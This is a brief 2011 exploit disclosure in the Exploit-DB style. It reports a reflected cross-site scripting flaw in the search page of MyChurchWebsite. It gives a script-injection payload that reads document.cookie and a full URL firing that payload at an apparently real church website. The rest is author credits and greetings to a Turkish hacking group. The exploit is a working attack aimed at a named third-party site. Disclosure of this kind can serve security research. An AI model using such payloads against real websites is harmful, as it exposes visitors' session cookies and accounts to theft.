MyChurchWebsite suffers from a cross site scripting vulnerability.
5847eedac4e1497ef48aaf2b2de2b8ebb0c2e3344648dc96f33426a056412f63
# Exploit Title: MyChurchWebsite XSS
# Date: 04.11.2011 - 17.55
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php
-------------------------------------------------------------
<script>alert(document.cookie)</script>
search.php?pageID=search&search=XSS
http://cacop.net/search.php?pageID=search&search=%3Cscript%3Ealert%28document.cookie%29%3C/s
cript%3E
Church Website Provided by mychurchwebsite.net
-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#